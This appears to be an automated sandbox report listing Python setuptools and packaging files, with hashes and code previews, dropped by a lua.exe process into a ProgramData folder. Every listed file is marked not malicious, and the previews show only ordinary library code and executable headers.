SSDEEP:	384:FMp0TNccqOwOvEYj73WnmgWilqllrr6dWgni:+0VqOwOvEYj7GnLWilAlrr643
MD5:	E68593DD6268BA28C359E5830A577214
SHA1:	9ED72920A9DC00F4E29FA68DBB7C3843448D59F3
SHA-256:	0A76E6F8E3BD0FFA9DF194C5C7315C8D26AF7B14981599B279AA0FBCCB2380F7
SHA-512:	E477ECB8FBBB3643C0485640F94CB80D8681089036F164E800BB9694C1D9FB4DA606B70197C608E4427BE8D9CE9320B1FD51B8EE4055E312FE4DC3067C122602
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details..from __future__ import absolute_import, division, print_function..import collections.import itertools.import re..from ._structures import Infinity, NegativeInfinity.from ._typing import TYPE_CHECKING..if TYPE_CHECKING: # pragma: no cover. from typing import Callable, Iterator, List, Optional, SupportsInt, Tuple, Union.. from ._structures import InfinityType, NegativeInfinityType.. InfiniteTypes = Union[InfinityType, NegativeInfinityType]. PrePostDevType = Union[InfiniteTypes, Tuple[str, int]]. SubLocalType = Union[InfiniteTypes, int, str]. LocalType = Union[. NegativeInfinityType,. Tuple[. Union[. SubLocalType,. Tuple[SubLocalType, str],. Tuple[NegativeInfinityType, SubLocalType],. ],. ...,. ]

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_vendor\pyparsing.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	232055
Entropy (8bit):	4.628655516703601
Encrypted:	false
SSDEEP:	6144:Nk7fj9Cr2dr4a4Nx+cOgq0emJ2gW6YnqTX8meDeJZOtxjK5cbE/NbE7EVkAP:KgOE5
MD5:	FC9C293F584C3BF6DE629AC89E5A0E83
SHA1:	6823808A8E61FD3E3EC722EF45AD6CF1B4BD9AA2
SHA-256:	B66AE9FA5BBEA8ED62EF967320DE40D769CA4510F50A6E15A64FB92D1F6B8A6B
SHA-512:	1D037ACBA4B9362A24F2E8867FA5B85FB1AAB1CF121DD0054EF7706E643E0D9D989A7CC202D04C5E9ACEE4A73D1AF08E082CA19D9C34A9FC04E4E9B001DE42E0
Malicious:	false
Preview:	# module pyparsing.py..#..# Copyright (c) 2003-2018 Paul T. McGuire..#..# Permission is hereby granted, free of charge, to any person obtaining..# a copy of this software and associated documentation files (the..# "Software"), to deal in the Software without restriction, including..# without limitation the rights to use, copy, modify, merge, publish,..# distribute, sublicense, and/or sell copies of the Software, and to..# permit persons to whom the Software is furnished to do so, subject to..# the following conditions:..#..# The above copyright notice and this permission notice shall be..# included in all copies or substantial portions of the Software...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT...# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY..# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\archive_util.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6638
Entropy (8bit):	4.337006446612503
Encrypted:	false
SSDEEP:	96:+q422sfhOjmSpcw13r/6MAB3ufjMMqPULaVF1YjmWq8+NaeBxyZuwjmy7pwk:+01fCD1biz3nMwUmL6HfqaefyUI
MD5:	F2178A00ECD87C7E5CD6C23C328A2301
SHA1:	7B4FE8CFCF11BAE6AC47CD7156864C0C20932715
SHA-256:	175F97AD02537571D13D1034F64C4F5B09BD67632CD6513F21064A1BF259EEB3
SHA-512:	62EFEC48D39DF716CABAB1B7D689936649CB2DBF023A99E316C0BADDE1E7326D405831EAB7947FA3C14B8D6409C462B2B613B4C7AB78EDE785F766D6D661BFA0
Malicious:	false
Preview:	"""Utilities for extracting common archive formats"""..import zipfile.import tarfile.import os.import shutil.import posixpath.import contextlib.from distutils.errors import DistutilsError..from pkg_resources import ensure_directory..__all__ = [. "unpack_archive", "unpack_zipfile", "unpack_tarfile", "default_filter",. "UnrecognizedFormat", "extraction_drivers", "unpack_directory",.]...class UnrecognizedFormat(DistutilsError):. """Couldn't recognize the archive type"""...def default_filter(src, dst):. """The default progress/filter callback; returns True for all files""". return dst...def unpack_archive(. filename, extract_dir, progress_filter=default_filter,. drivers=None):. """Unpack `filename` to `extract_dir`, or raise ``UnrecognizedFormat``.. `progress_filter` is a function taking two arguments: a source path. internal to the archive ('/'-separated), and a filesystem path where it. will be extracted. The callback must return the desired extr

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\build_meta.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	10096
Entropy (8bit):	4.52817011054291
Encrypted:	false
SSDEEP:	192:1eNqD29sRoTVRF5bF049h7eVuxTJFFHwsxcbQ:1qqDcsRaFjTF9HB
MD5:	B90E958F80BB4DDD111C6A06E04E56D5
SHA1:	27C92F4AE7AAE8814ED27F5F662E97AE306A5D19
SHA-256:	6E6E519C19B28019DE3A575A2E172E9DC3A24EA1F934F7416484957940DE6327
SHA-512:	5E95B784C0F56D5D64B38C3B09F278AE2F07E0723D36801ABC6B18372BBB29E38800A25D0A247567E9A07BDFDBE6E671ADC13B56DAAEBF54905936AEFFF2BF37
Malicious:	false
Preview:	"""A PEP 517 interface to setuptools..Previously, when a user or a command line tool (let's call it a "frontend").needed to make a request of setuptools to take a certain action, for.example, generating a list of installation requirements, the frontend would.would call "setup.py egg_info" or "setup.py bdist_wheel" on the command line...PEP 517 defines a different method of interfacing with setuptools. Rather.than calling "setup.py" directly, the frontend should:.. 1. Set the current directory to the directory with a setup.py file. 2. Import this module into a safe python interpreter (one in which. setuptools can potentially set global variables or crash hard).. 3. Call one of the functions defined in PEP 517...What each function does is defined in PEP 517. However, here is a "casual".definition of the functions (this definition should not be relied on for.bug reports or API stability):.. - `build_wheel`: build a wheel in the folder and return the basename. - `get_requires_for_

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\cli-32.exe Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	6.3831025404791655
Encrypted:	false
SSDEEP:	768:2jfnJFqNSkejOy27eW2Vef/7yX3jFICnFfvoUs49RsS98Pu4TNz14GAeRgxQ:ufnLq01weW5yX3jFxv49Nu4GhQ
MD5:	A32A382B8A5A906E03A83B4F3E5B7A9B
SHA1:	11E2BDD0798761F93CCE363329996AF6C17ED796
SHA-256:	75F12EA2F30D9C0D872DADE345F30F562E6D93847B6A509BA53BEEC6D0B2C346
SHA-512:	EC87DD957BE21B135212454646DCABDD7EF9442CF714E2C1F6B42B81F0C3FA3B1875BDE9A8B538E8A0AA2190225649C29E9ED0F25176E7659E55E422DD4EFE4C
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......YS.j.2.9.2.9.2.9:..9.2.9.2.9F2.9.}.9.2.9.`.992.9.`.9.2.9.`.9m2.9.`.9.2.9Rich.2.9................PE..L......Q.....................N.......%............@..........................@..............................................,...(.......................................................................@...............@............................text...]........................... ..`.rdata..` ......."..................@..@.data....+..........................@...........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\cli-64.exe Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	74752
Entropy (8bit):	6.129445337728628
Encrypted:	false
SSDEEP:	1536:PnDpvQm1Gk/NAIL5ZFR+Emf1rFX6YczDo87h2nO/Hda5QO6F:PDpv5tFA25ZA1J6Ho87kO/HdqQ5
MD5:	D2778164EF643BA8F44CC202EC7EF157
SHA1:	31EEE7114EED6B0D2FB77C9F3605057639050786
SHA-256:	28B001BB9A72AE7A24242BFAB248D767A1AC5DEC981C672A3944F7A072375E9A
SHA-512:	CB2A5A2AEBA9D6F6BFC4A3A4576961244C109AAFB59F02134B03EBAC4D16602EE7F141CC4ADC519F15030C20E7E7D6585778870706B2EA4C74C1161729101635
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W..^W..^W..^p..^T..^W..^...^.0.^S..^I-.^s..^I-.^]..^I-.^:..^I-.^V..^RichW..^................PE..d......Q..........#..........j......x+.........@.............................p..................................................................(............`.......................................................................................................text............................... ..`.rdata...).......*..................@..@.data....5... ......................@....pdata.......`......................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\cli.exe Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	6.3831025404791655
Encrypted:	false
SSDEEP:	768:2jfnJFqNSkejOy27eW2Vef/7yX3jFICnFfvoUs49RsS98Pu4TNz14GAeRgxQ:ufnLq01weW5yX3jFxv49Nu4GhQ
MD5:	A32A382B8A5A906E03A83B4F3E5B7A9B
SHA1:	11E2BDD0798761F93CCE363329996AF6C17ED796
SHA-256:	75F12EA2F30D9C0D872DADE345F30F562E6D93847B6A509BA53BEEC6D0B2C346
SHA-512:	EC87DD957BE21B135212454646DCABDD7EF9442CF714E2C1F6B42B81F0C3FA3B1875BDE9A8B538E8A0AA2190225649C29E9ED0F25176E7659E55E422DD4EFE4C
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......YS.j.2.9.2.9.2.9:..9.2.9.2.9F2.9.}.9.2.9.`.992.9.`.9.2.9.`.9m2.9.`.9.2.9Rich.2.9................PE..L......Q.....................N.......%............@..........................@..............................................,...(.......................................................................@...............@............................text...]........................... ..`.rdata..` ......."..................@..@.data....+..........................@...........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\command\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	568
Entropy (8bit):	4.517507866437047
Encrypted:	false
SSDEEP:	12:U3z6jEQRngIqKtaswedlJh/ybt3/NMbJdkyk6EoaFg9tTikN5tTi/5ySFLLHtTiO:rjdtVq3s5l+t1Mojox9YQY/5XHYjB8
MD5:	FC5FB6F88735F3909F8F3B33DDB5FF80
SHA1:	CF238A418A096504ED6D89038E236FCCB3C04B0B
SHA-256:	40202E03DC219EAF019E87346C1692E8BC3F28050ED0388761941710C367E618
SHA-512:	DBDCBEC247D2A4B10506ECC734CC135ACE1C40D6127A9ACA81B7F47F9DA080DF0B861205FC294DF6A5AD7F0D28DDDA7568B1E74E3C73BE43A359C7BF5ACDFD03
Malicious:	false
Preview:	__all__ = [. 'alias', 'bdist_egg', 'bdist_rpm', 'build_ext', 'build_py', 'develop',. 'easy_install', 'egg_info', 'install', 'install_lib', 'rotate', 'saveopts',. 'sdist', 'setopt', 'test', 'install_egg_info', 'install_scripts',. 'bdist_wininst', 'upload_docs', 'build_clib', 'dist_info',.]..from distutils.command.bdist import bdist.import sys..from setuptools.command import install_scripts..if 'egg' not in bdist.format_commands:. bdist.format_command['egg'] = ('bdist_egg', "Python .egg file"). bdist.format_commands.append('egg')..del bdist, sys.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\command\alias.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2381
Entropy (8bit):	4.31681776422536
Encrypted:	false
SSDEEP:	48:Gl71hQuyinUv4hb2nnDMhLDqVUievrmwz90rmuAf9/rwPxXK73TTql:0731yin+48ohnOQTTql
MD5:	6B8A4071FAD36E65A50FDE422FEB3D48
SHA1:	A5482569A34E9045E6A00B50FBA5107271230316
SHA-256:	D6C2D0C5970D87A7434290E69B81BB506193A25F379D8D4D4CF98D05B9B6B222
SHA-512:	19FA39CD447A7D295F8F5A280A09E6ABE55B1276850CF67CA937AA28C823C6DF8D5D593DE220D79ABA5113E63FDA5E5B553894DEB8CCBDE1E17817D0DDCC8709
Malicious:	false
Preview:	from distutils.errors import DistutilsOptionError..from setuptools.command.setopt import edit_config, option_base, config_file...def shquote(arg):. """Quote an argument for later parsing by shlex.split()""". for c in '"', "'", "\\", "#":. if c in arg:. return repr(arg). if arg.split() != [arg]:. return repr(arg). return arg...class alias(option_base):. """Define a shortcut that invokes one or more commands""".. description = "define a shortcut to invoke one or more commands". command_consumes_arguments = True.. user_options = [. ('remove', 'r', 'remove (unset) the alias'),. ] + option_base.user_options.. boolean_options = option_base.boolean_options + ['remove'].. def initialize_options(self):. option_base.initialize_options(self). self.args = None. self.remove = None.. def finalize_options(self):. option_base.finalize_options(self). if self.remove and len(self.args) != 1:.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\command\bdist_egg.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	18244
Entropy (8bit):	4.450550209791371
Encrypted:	false
SSDEEP:	384:P7AA1cXy67F3Jma/NDDxSdzJ5yHW5mOrGgMt6:P7AAh6R3XOJ5yHW5mO9Mt6
MD5:	F0C805BC90591DF7ACC0F77598CC453C
SHA1:	07CA30838D4C0737C390D04C03A6345D766AD448
SHA-256:	F6A28A2D1F60B585F1F38C715380D0613B4C2BFFE6AEC6B1C235008864357E86
SHA-512:	B1C768EAC8F64114743B367F857A88A44E4172E522E3A4AA2E2C348A635C1A72EE825A64C70ECC145BE44DBFF570C014537A0AB5D7FC0EB80F558B0C5788E57A
Malicious:	false
Preview:	"""setuptools.command.bdist_egg..Build .egg distributions"""..from distutils.errors import DistutilsSetupError.from distutils.dir_util import remove_tree, mkpath.from distutils import log.from types import CodeType.import sys.import os.import re.import textwrap.import marshal.import warnings..from pkg_resources import get_build_platform, Distribution, ensure_directory.from pkg_resources import EntryPoint.from setuptools.extension import Library.from setuptools import Command, SetuptoolsDeprecationWarning..from sysconfig import get_path, get_python_version...def _get_purelib():. return get_path("purelib")...def strip_module(filename):. if '.' in filename:. filename = os.path.splitext(filename)[0]. if filename.endswith('module'):. filename = filename[:-6]. return filename...def sorted_walk(dir):. """Do os.walk in a reproducible way,. independent of indeterministic filesystem readdir order. """. for base, dirs, files in os.walk(dir):. dirs.sort

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\command\bdist_rpm.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	900
Entropy (8bit):	4.278077470620012
Encrypted:	false
SSDEEP:	24:gMEGHaBo/CqbpJgN7gi5mv9Nz/7e9NFuhP:HUBGCqzgNc+mLae
MD5:	1FEA5037CFCCF062A40CCCBFBA7DB6F7
SHA1:	CB66C7B481CA98F995A2F54E9F5D85911DA854D5
SHA-256:	FF863BB55033BB5CC4B8373CB6945D13FB32DF3493DE1DCB3D3B738A8A2CE429
SHA-512:	387CC1D1F3D21B774183CBF4E8C50EE1D498E34FC72A8053C005580E865452D856636821529F668F7697C8DEE7F272499EC9DE365E1C99EEE675EC1E0B6D5575
Malicious:	false
Preview:	import distutils.command.bdist_rpm as orig...class bdist_rpm(orig.bdist_rpm):. """. Override the default bdist_rpm behavior to do the following:.. 1. Run egg_info to ensure the name and version are properly calculated.. 2. Always run 'install' using --single-version-externally-managed to. disable eggs in RPM distributions.. """.. def run(self):. # ensure distro name is up-to-date. self.run_command('egg_info').. orig.bdist_rpm.run(self).. def _make_spec_file(self):. spec = orig.bdist_rpm._make_spec_file(self). spec = [. line.replace(. "setup.py install ",. "setup.py install --single-version-externally-managed ". ).replace(. "%setup",. "%setup -n %{name}-%{unmangled_version}". ). for line in spec. ]. return spec.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\command\bdist_wininst.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	922
Entropy (8bit):	4.344630309981415
Encrypted:	false
SSDEEP:	12:0TMbwbreXQoYQBXb95bqpKyRCvKwpXUh4SgQxs2xFUBtQe8bBH4PiaNIlEvsldiZ:gMYkQzcTqpK4wGh4S3s22IB7v7ieru
MD5:	668C913385E1AAFAC95D467E372E759B
SHA1:	12E1A6E15CCB0E9A61EB69AC5B06096BB10C9509
SHA-256:	4E6A9AF705B417C8BFEF62875A9BBDA4376708DE84AFFF2E254B36526080C130
SHA-512:	8D37B2DF3FBC57817F812FA0B336F64BDE2CB293ED60D927F8B28D91AB995F280B74AC7D8EB72F1AEB2108191D3926CCC482591ADE7BFE1CB2A5167ABFAF1BE4
Malicious:	false
Preview:	import distutils.command.bdist_wininst as orig.import warnings..from setuptools import SetuptoolsDeprecationWarning...class bdist_wininst(orig.bdist_wininst):. def reinitialize_command(self, command, reinit_subcommands=0):. """. Supplement reinitialize_command to work around. http://bugs.python.org/issue20819. """. cmd = self.distribution.reinitialize_command(. command, reinit_subcommands). if command in ('install', 'install_lib'):. cmd.install_lib = None. return cmd.. def run(self):. warnings.warn(. "bdist_wininst is deprecated and will be removed in a future ". "version. Use bdist_wheel (wheel packages) instead.",. SetuptoolsDeprecationWarning. ).. self._is_running = True. try:. orig.bdist_wininst.run(self). finally:. self._is_running = False.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\command\build_clib.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4415
Entropy (8bit):	4.002732268627592
Encrypted:	false
SSDEEP:	96:XmmRRV5uinsJmPOw9Rmr5IJmD4lZ2rNrAqjW4ddHk:2m779iNjAzem
MD5:	2D4BFF774400FF672FF40797FDF92507
SHA1:	D8414C9AC5C0109E1E863B887CAA72B3B075DFA6
SHA-256:	7D61D2146924D7454275D0560ACCEF361A306C6F59F42657563436B92227A0EB
SHA-512:	7498E0D503124EED4E0FB57BCA612B62405245AE541DFC1AE145F0908A8E25C7D698B4C20D7D9E29D1B35684150C19DB1DEEC4CDC99BFA5751C47ABBC7467668
Malicious:	false
Preview:	import distutils.command.build_clib as orig.from distutils.errors import DistutilsSetupError.from distutils import log.from setuptools.dep_util import newer_pairwise_group...class build_clib(orig.build_clib):. """. Override the default build_clib behaviour to do the following:.. 1. Implement a rudimentary timestamp-based dependency system. so 'compile()' doesn't run every time.. 2. Add more keys to the 'build_info' dictionary:. * obj_deps - specify dependencies for each object compiled.. this should be a dictionary mapping a key. with the source filename to a list of. dependencies. Use an empty string for global. dependencies.. * cflags - specify a list of additional flags to pass to. the compiler.. """.. def build_libraries(self, libraries):. for (lib_name, build_info) in libraries:. sources = build_info.get('sources').

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\command\build_ext.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	13027
Entropy (8bit):	4.402222772923825
Encrypted:	false
SSDEEP:	192:Zx155IeMb8i/+SOLBN55snLRNv3+bPlTIKPK55bNq:ZxiL+JFsL/MPFPKrc
MD5:	EFDC5747D8A2938D635E216B42B05252
SHA1:	9CFD65A18C296D65F3B4B1EA3F36D5A2D6E5470A
SHA-256:	688FEA9CAF66F2550B6434BA5CCBFFA768F6A487A155B49AADBE0F2470C0EDDC
SHA-512:	9C847AC23CC24407AE598B095B26BD3853356029AE03714F3AAA3A87C2C5E647A87E3EE0EA359DD726A697B1D758183824B41409599B7B037D2A24EF8170325E
Malicious:	false
Preview:	import os.import sys.import itertools.from importlib.machinery import EXTENSION_SUFFIXES.from distutils.command.build_ext import build_ext as _du_build_ext.from distutils.file_util import copy_file.from distutils.ccompiler import new_compiler.from distutils.sysconfig import customize_compiler, get_config_var.from distutils.errors import DistutilsError.from distutils import log..from setuptools.extension import Library..try:. # Attempt to use Cython for building extensions, if available. from Cython.Distutils.build_ext import build_ext as _build_ext. # Additionally, assert that the compiler module will load. # also. Ref #1229.. __import__('Cython.Compiler.Main').except ImportError:. _build_ext = _du_build_ext..# make sure _config_vars is initialized.get_config_var("LDSHARED").from distutils.sysconfig import _config_vars as _CONFIG_VARS # noqa...def _customize_compiler_for_shlib(compiler):. if sys.platform == "darwin":. # building .dylib requires additional c

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\command\build_py.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	9473
Entropy (8bit):	4.347556590279039
Encrypted:	false
SSDEEP:	96:bI/qG+1R5+53rBpaRyKSg6hPsIlGglGz9dZ/8qVwO4JbZNOn6jF6F7Or4hj+3QG8:sO1RcFBQADdigIhT/T4J7IFNjoQZr
MD5:	CCD2B6F2C44281EDCFC9E9B504F3FFC4
SHA1:	53221D742CF994DAB38BB39FBF107384CCAE86E8
SHA-256:	D740CD62268CEF4ED4189F9E57A60D708291375A5B53B5305C66145C00AB5D4F
SHA-512:	CB498AD95DF0C7381697D204FC6239288728B0D14400F382B65933D60990A53826EB5E5878BD3938C06AAB580C2E2999DF36EF27622840595FDCAAF31BA2B36A
Malicious:	false
Preview:	from glob import glob.from distutils.util import convert_path.import distutils.command.build_py as orig.import os.import fnmatch.import textwrap.import io.import distutils.errors.import itertools.import stat..try:. from setuptools.lib2to3_ex import Mixin2to3.except Exception:.. class Mixin2to3:. def run_2to3(self, files, doctests=True):. "do nothing"...def make_writable(target):. os.chmod(target, os.stat(target).st_mode \| stat.S_IWRITE)...class build_py(orig.build_py, Mixin2to3):. """Enhanced 'build_py' command that includes data files with packages.. The data files are specified via a 'package_data' argument to 'setup()'.. See 'setuptools.dist.Distribution' for more details... Also, this version of the 'build_py' command allows you to specify both. 'py_modules' and 'packages' in the same setup operation.. """.. def finalize_options(self):. orig.build_py.finalize_options(self). self.package_data = self.distribution.package_d

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\command\develop.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8045
Entropy (8bit):	4.417521277394386
Encrypted:	false
SSDEEP:	96:qrlMLFJ0GKAbrBILB4LqmoG8oV8ZvaR1t0g5zZMI5KvZJmJmUS6Zg0smjpH+P:x5lKgrBILB4myu/SqxJjiZg0Zy
MD5:	070D0AEF52F261EBA2F286637E769CE8
SHA1:	8149B9AEAEB2C23A22717EEAB4E85BD39B4E11CB
SHA-256:	074A79761ED5AD231D11F85D504FC02655A4D94C407AC38E635E02015E7F0C40
SHA-512:	81014D0123C5F888C87E7C279846C090A33E75691E1162022CA13EF7E2EE95438816DA2DBC1B37FBA8A40ABBC82D9148B16E13464001AE6A64ADAB97EFE20828
Malicious:	false
Preview:	from distutils.util import convert_path.from distutils import log.from distutils.errors import DistutilsError, DistutilsOptionError.import os.import glob.import io..import pkg_resources.from setuptools.command.easy_install import easy_install.from setuptools import namespaces.import setuptools...class develop(namespaces.DevelopInstaller, easy_install):. """Set up package for development""".. description = "install package in 'development mode'".. user_options = easy_install.user_options + [. ("uninstall", "u", "Uninstall this source package"),. ("egg-path=", None, "Set the path to be used in the .egg-link file"),. ].. boolean_options = easy_install.boolean_options + ['uninstall'].. command_consumes_arguments = False # override base.. def run(self):. if self.uninstall:. self.multi_version = True. self.uninstall_link(). self.uninstall_namespaces(). else:. self.install_for_development(). s

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\command\dist_info.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	960
Entropy (8bit):	4.46687605159988
Encrypted:	false
SSDEEP:	24:en/MsWJOLMkCbeczaSWbGhQ0znd5GWb/v:enUfwLaaSWihzKWj
MD5:	8E63B92477E2C02E10805857EA5CF636
SHA1:	07ABE0249CB9763A24EFC7055AF7F6FA18FB1915
SHA-256:	E6DEA439FADD8002D3F8FDE882CB3A3C5F64F8B7B27ACB9EC9CBA4DDD5326672
SHA-512:	3E3F2E552408720D9753D124326C8A374214888ED164B6CEC52C41B3E8B38FA7A95D350752ABE3CCBFDFE7F81D06663123F805DA2B6054F8D3512D8545FA52B7
Malicious:	false
Preview:	""".Create a dist_info directory.As defined in the wheel specification."""..import os..from distutils.core import Command.from distutils import log...class dist_info(Command):.. description = 'create a .dist-info directory'.. user_options = [. ('egg-base=', 'e', "directory containing .egg-info directories". " (default: top of the source tree)"),. ].. def initialize_options(self):. self.egg_base = None.. def finalize_options(self):. pass.. def run(self):. egg_info = self.get_finalized_command('egg_info'). egg_info.egg_base = self.egg_base. egg_info.finalize_options(). egg_info.run(). dist_info_dir = egg_info.egg_info[:-len('.egg-info')] + '.dist-info'. log.info("creating '{}'".format(os.path.abspath(dist_info_dir))).. bdist_wheel = self.get_finalized_command('bdist_wheel'). bdist_wheel.egg2dist(egg_info.egg_info, dist_info_dir).

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\command\easy_install.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	86430
Entropy (8bit):	4.409210177069537
Encrypted:	false
SSDEEP:	768:vc6GqJmlngWmo7QQBV5Lfhp3oqj1NVPgFoAyLDMCmbeNjRrjSUVU2i6qw2H6M6tX:vHkWW7Uehf1XXLQiZ+V6l2H6M6xc9XAZ
MD5:	3531C9A51C4C6C2F18493424DFB2D51D
SHA1:	B79660C1844668B1EB11A8542554157D6F176E89
SHA-256:	94C4CC05BC2C35D7FBBD83898CF0996025015D5A8ECCAB1DF8D084D15EFA7675
SHA-512:	884C8DCD85D767BD4770C8A2AC4526DEC98041DA07DC32F2D642ACCAF3213EF567CB1E2ED308FF9A3DB6AF2D3E6AB429DFEC9ED95E8BCE5C1BFF675B46A32893
Malicious:	false
Preview:	""".Easy Install.------------..A tool for doing automatic download/extract/build of distutils-based Python.packages. For detailed documentation, see the accompanying EasyInstall.txt.file, or visit the `EasyInstall home page`__...__ https://setuptools.readthedocs.io/en/latest/easy_install.html.."""..from glob import glob.from distutils.util import get_platform.from distutils.util import convert_path, subst_vars.from distutils.errors import (. DistutilsArgError, DistutilsOptionError,. DistutilsError, DistutilsPlatformError,.).from distutils.command.install import INSTALL_SCHEMES, SCHEME_KEYS.from distutils import log, dir_util.from distutils.command.build_scripts import first_line_re.from distutils.spawn import find_executable.import sys.import os.import zipimport.import shutil.import tempfile.import zipfile.import re.import stat.import random.import textwrap.import warnings.import site.import struct.import contextlib.import subprocess.import shlex.import io.import configparser...

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\command\egg_info.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	25495
Entropy (8bit):	4.393707718507853
Encrypted:	false
SSDEEP:	192:E6ClzxUck0qgjdse4UAZ8uy7FPJDOLghNswxrAKXO3bfa1UpntWz38gT7+fnQkZC:E6CNeck0jjmy6chNsarBOrSrDTiymS
MD5:	547563048D1684E619A11B988FCC5D69
SHA1:	47A1B892D7F4474CEA3BECB042177DD78C4C1F6F
SHA-256:	6BE7C2ED2088A6B69FACE94510E7C07FBA31292A655BDDA4466D5166412E046A
SHA-512:	132EBF988C8F9F4C34FABDB1974CC0B91D9CF22457CDAE5AB1318CC93558FFD3CF7595E276224812C970786D948FF1B7A910885317F28428DA485630798D2B46
Malicious:	false
Preview:	"""setuptools.command.egg_info..Create a distribution's .egg-info directory and contents"""..from distutils.filelist import FileList as _FileList.from distutils.errors import DistutilsInternalError.from distutils.util import convert_path.from distutils import log.import distutils.errors.import distutils.filelist.import os.import re.import sys.import io.import warnings.import time.import collections..from setuptools import Command.from setuptools.command.sdist import sdist.from setuptools.command.sdist import walk_revctrl.from setuptools.command.setopt import edit_config.from setuptools.command import bdist_egg.from pkg_resources import (. parse_requirements, safe_name, parse_version,. safe_version, yield_lines, EntryPoint, iter_entry_points, to_filename).import setuptools.unicode_utils as unicode_utils.from setuptools.glob import glob..from setuptools.extern import packaging.from setuptools import SetuptoolsDeprecationWarning...def translate_pattern(glob):. """. Translate a

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\command\install.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4705
Entropy (8bit):	4.484072718867001
Encrypted:	false
SSDEEP:	96:/kudlF+i/O2RCFEXxSGjfhrtLgqgJmQhXMuon64dAIm3wn:XlYz2RCFEXxS6ft3gEUXi6cBn
MD5:	52357392851D613DDC2ECB39EEA683FA
SHA1:	445482EF8E7C7867EDDFC2AE1D47137FB71F2415
SHA-256:	F1DA0CC5E4040E82B811CA3498ED969575F3CE9F509EC18943B67BC969193C6F
SHA-512:	8C2A2E99ABFB51EEF3473F55CA2475A33982E1021F07793943E588196D204D531C7F152BF2651D1172ACFCD1038285BBFB07E13BF9A017C058CBC042E1E5F8D7
Malicious:	false
Preview:	from distutils.errors import DistutilsArgError.import inspect.import glob.import warnings.import platform.import distutils.command.install as orig..import setuptools..# Prior to numpy 1.9, NumPy relies on the '_install' name, so provide it for.# now. See https://github.com/pypa/setuptools/issues/199/._install = orig.install...class install(orig.install):. """Use easy_install to install the package, w/dependencies""".. user_options = orig.install.user_options + [. ('old-and-unmanageable', None, "Try not to use this!"),. ('single-version-externally-managed', None,. "used by system package builders to create 'flat' eggs"),. ]. boolean_options = orig.install.boolean_options + [. 'old-and-unmanageable', 'single-version-externally-managed',. ]. new_commands = [. ('install_egg_info', lambda self: True),. ('install_scripts', lambda self: True),. ]. _nc = dict(new_commands).. def initialize_options(self):. orig.install

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\command\install_egg_info.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2203
Entropy (8bit):	4.398298621943252
Encrypted:	false
